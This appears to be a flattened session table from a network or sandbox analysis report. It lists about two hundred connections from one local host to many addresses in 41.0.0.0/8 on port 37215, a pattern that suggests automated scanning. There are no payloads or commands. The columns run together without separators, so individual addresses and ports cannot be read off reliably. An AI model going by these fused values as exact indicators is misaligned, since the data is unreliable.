                                                                            8309192.168.2.154363041.176.37.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8310192.168.2.154105641.166.184.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8311192.168.2.155087441.105.64.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8312192.168.2.155800841.164.9.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8313192.168.2.153503841.185.180.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8314192.168.2.155487841.57.251.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8315192.168.2.155076841.232.16.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8316192.168.2.153915441.187.3.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8317192.168.2.153747641.7.236.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8318192.168.2.154863241.162.3.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8319192.168.2.153601441.52.121.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8320192.168.2.154641841.35.124.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8321192.168.2.155587241.226.209.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8322192.168.2.155792241.96.64.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8323192.168.2.155313241.26.156.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8324192.168.2.155675641.21.160.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8325192.168.2.154834041.73.181.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8326192.168.2.154476041.35.193.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8327192.168.2.153847441.249.229.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8328192.168.2.155270641.102.57.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8329192.168.2.153885041.18.145.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8330192.168.2.155626241.223.120.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8331192.168.2.154329841.235.224.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8332192.168.2.155248641.20.179.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8333192.168.2.154143441.5.145.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8334192.168.2.155341241.52.23.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8335192.168.2.155943441.250.12.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8336192.168.2.154407441.175.90.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8337192.168.2.155518241.152.28.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8338192.168.2.154837241.69.32.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8339192.168.2.154824241.89.9.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8340192.168.2.153612441.132.204.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8341192.168.2.155876041.192.92.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8342192.168.2.154689241.173.222.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8343192.168.2.155528641.47.33.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8344192.168.2.154818641.147.181.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8345192.168.2.153999441.67.45.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8346192.168.2.153312841.49.80.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8347192.168.2.153915641.229.2.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8348192.168.2.153784841.82.229.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8349192.168.2.153743241.242.95.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8350192.168.2.154044041.62.101.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8351192.168.2.154571441.100.247.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8352192.168.2.155265041.231.211.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8353192.168.2.155065441.219.253.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8354192.168.2.153909841.93.111.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8355192.168.2.155987841.5.21.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8356192.168.2.153399841.190.128.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8357192.168.2.154808841.113.109.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8358192.168.2.153536441.167.235.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8359192.168.2.153745641.22.59.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8360192.168.2.154751241.1.27.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8361192.168.2.153881441.235.97.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8362192.168.2.154008241.151.92.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8363192.168.2.154309641.91.255.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8364192.168.2.153724241.183.41.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8365192.168.2.154018641.179.254.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8366192.168.2.155449041.221.196.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8367192.168.2.153347441.82.15.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8368192.168.2.155197241.109.11.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8369192.168.2.154356441.151.32.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8370192.168.2.155085441.124.96.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8371192.168.2.156038241.114.54.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8372192.168.2.154795041.120.203.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8373192.168.2.154509841.41.147.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8374192.168.2.154152041.226.252.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8375192.168.2.155608841.62.64.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8376192.168.2.154147041.108.14.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8377192.168.2.154219241.187.161.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8378192.168.2.154029241.91.250.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8379192.168.2.153522041.111.25.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8380192.168.2.155162641.187.69.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8381192.168.2.155684841.87.74.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8382192.168.2.155055641.165.82.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8383192.168.2.154732041.122.142.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8384192.168.2.153851841.122.205.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8385192.168.2.154426441.4.51.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8386192.168.2.153958641.155.114.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8387192.168.2.154122041.195.12.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8388192.168.2.154023041.112.118.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8389192.168.2.153665241.112.210.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8390192.168.2.154237241.244.206.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8391192.168.2.155529841.40.69.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8392192.168.2.155157041.50.192.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8393192.168.2.154433041.116.36.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8394192.168.2.155454441.218.89.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8395192.168.2.155365441.79.113.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8396192.168.2.153809241.88.181.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8397192.168.2.153414241.245.97.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8398192.168.2.155112241.241.88.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8399192.168.2.155122041.77.200.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8400192.168.2.154222641.125.211.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8401192.168.2.155960441.84.95.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8402192.168.2.153345841.220.184.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8403192.168.2.155677441.64.129.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8404192.168.2.154314441.152.52.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8405192.168.2.154587841.51.119.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8406192.168.2.154893441.123.78.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8407192.168.2.153351441.98.125.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8408192.168.2.154030241.236.127.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8409192.168.2.155460841.189.113.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8410192.168.2.155541241.201.36.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8411192.168.2.155237641.36.252.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8412192.168.2.153704441.230.151.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8413192.168.2.155308641.29.194.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8414192.168.2.156088441.49.84.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8415192.168.2.155734841.150.136.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8416192.168.2.154411641.4.191.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8417192.168.2.154879841.3.25.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8418192.168.2.154683041.215.213.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8419192.168.2.155037841.221.204.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8420192.168.2.155245241.221.56.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8421192.168.2.153399641.118.12.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8422192.168.2.154289041.30.185.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8423192.168.2.155483441.50.240.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8424192.168.2.155235841.69.64.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8425192.168.2.154367641.39.26.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8426192.168.2.156066641.111.84.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8427192.168.2.154815441.35.168.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8428192.168.2.153815241.39.26.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8429192.168.2.154375441.224.128.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8430192.168.2.153432641.157.170.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8431192.168.2.154606841.94.46.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8432192.168.2.154664241.240.125.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8433192.168.2.153820041.169.219.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8434192.168.2.154350641.68.32.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8435192.168.2.154593041.69.81.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8436192.168.2.153971441.82.254.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8437192.168.2.154486241.232.74.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8438192.168.2.155529841.61.34.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8439192.168.2.154753841.101.155.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8440192.168.2.155660041.13.102.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8441192.168.2.153440641.249.87.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8442192.168.2.155113241.104.36.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8443192.168.2.154620841.183.35.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8444192.168.2.154007041.14.141.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8445192.168.2.154554641.22.141.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8446192.168.2.156001441.144.132.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8447192.168.2.153428041.8.168.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8448192.168.2.154174641.80.165.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8449192.168.2.154480041.78.179.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8450192.168.2.155249841.28.61.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8451192.168.2.154993441.76.220.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8452192.168.2.155623641.15.226.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8453192.168.2.154155041.219.77.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8454192.168.2.154304641.193.184.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8455192.168.2.153492041.167.124.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8456192.168.2.153538841.134.91.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8457192.168.2.155805641.66.178.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8458192.168.2.154391241.32.97.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8459192.168.2.153662241.43.56.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8460192.168.2.156069041.165.245.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8461192.168.2.154212441.98.7.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8462192.168.2.155670041.102.106.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8463192.168.2.154572641.62.4.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8464192.168.2.155905841.53.214.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8465192.168.2.154701841.124.247.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8466192.168.2.154497841.164.135.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8467192.168.2.154525241.31.65.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8468192.168.2.154475641.83.252.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8469192.168.2.154283441.36.15.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8470192.168.2.154479841.43.159.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8471192.168.2.156065241.152.90.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8472192.168.2.154231241.53.81.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8473192.168.2.155677041.29.240.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8474192.168.2.153645041.81.251.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8475192.168.2.156084041.102.32.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8476192.168.2.153619841.254.121.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8477192.168.2.153408841.37.127.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8478192.168.2.154941841.222.142.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8479192.168.2.153841641.94.166.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8480192.168.2.154032641.182.189.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8481192.168.2.154682241.228.119.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8482192.168.2.154767641.149.239.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8483192.168.2.155615841.174.254.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8484192.168.2.155100441.17.198.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8485192.168.2.153888641.56.79.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8486192.168.2.155269041.81.157.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8487192.168.2.153551241.215.109.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8488192.168.2.154160241.250.153.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8489192.168.2.155741241.157.142.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8490192.168.2.155982241.214.7.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8491192.168.2.154156041.95.250.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8492192.168.2.155197641.87.197.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8493192.168.2.154959841.176.74.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8494192.168.2.154946641.141.250.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8495192.168.2.154418241.124.22.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8496192.168.2.153280241.240.213.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8497192.168.2.155663041.6.119.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8498192.168.2.155333841.44.41.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8499192.168.2.153848041.206.63.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8500192.168.2.153497441.66.5.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8501192.168.2.155751841.125.255.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8502192.168.2.155847041.42.58.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8503192.168.2.153848841.74.211.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8504192.168.2.154372241.196.86.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8505192.168.2.154402841.197.160.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8506192.168.2.154418241.30.40.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8507192.168.2.154360641.146.10.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8508192.168.2.153930241.214.166.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8509192.168.2.154586441.231.198.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8510192.168.2.155537641.73.94.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8511192.168.2.153402441.157.68.19837215
                                                                            TimestampBytes transferredDirectionData


